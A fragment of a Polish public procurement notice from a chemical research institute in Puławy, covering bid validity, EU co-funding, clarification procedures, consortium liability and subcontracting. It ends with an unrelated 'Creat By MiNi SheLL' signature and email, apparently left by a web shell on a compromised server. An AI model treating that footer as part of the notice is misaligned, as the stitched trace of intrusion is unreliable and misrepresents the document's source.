<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach programu Rozwój Polski Wschodniej 2007-2013 
Każdy wykonawca ma prawo zwrócić się do Zamawiającego o wyjaśnienie treści Specyfikacji Istotnych Warunków Zamówienia. Pytania wykonawców muszą być sformułowane na piśmie i skierowane na adres:
 
INSTYTUT NOWYCH SYNTEZ CHEMICZNYCH 
Al. Tysiąclecia Państwa Polskiego 13A, 24 - 110 PUŁAWY 
lub na adres e-mail: 
ins@ins.pulawy.pl 

Zamawiający udzieli niezwłocznie odpowiedzi wszystkim Wykonawcom, którzy otrzymali Specyfikację Istotnych Warunków Zamówienia, pod warunkiem, że wniosek o wyjaśnienie treści Specyfikacji Istotnych Warunków Zamówienia wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści Specyfikacji Istotnych Warunków Zamówienia wpłynął po upływie terminu składania wniosku, o którym mowa wyżej lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez rozpoznania. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa powyżej. 
Wykonawcy i Zamawiający porozumiewać się będą pisemnie drogą korespondencji elektronicznej lub telefaksu - nr 081 473 17 48. Wszystkie oświadczenia, wnioski, zawiadomienia i informacje przekazane za pomocą telefaksu lub korespondencji elektronicznej uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona pisemnie.
Zamawiający nie przewiduje zorganizowania zebrania z wykonawcami. 
W przypadku, kiedy ofertę składa kilka podmiotów, oferta musi spełniać następujące warunki: 
Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela/partnera wiodącego. 
Upoważnienie do pełnienia funkcji przedstawiciela/partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty. 
Przedstawiciel wiodący/partner winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego i na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy załączyć stosowne oświadczenie. 

Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań. 

Przed podpisaniem umowy Zamawiający będzie żądał przekazania kopii (potwierdzonej za zgodność z oryginałem) umowy lub innego dokumentu potwierdzającego zawarcie konsorcjum lub spółki cywilnej, podpisanej przez wszystkich partnerów lub wspólników przy czym termin, na jaki została zawarta umowa konsorcjum lub spółki cywilnej nie może być krótszy niż termin realizacji zamówienia. 
Wykonawca może zlecić wykonanie części przedmiotu zamówienia podwykonawcom z zastrzeżeniem wskazania w ofercie części zamówienia, którą zamierza powierzyć do wykonania podwykonawcom..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com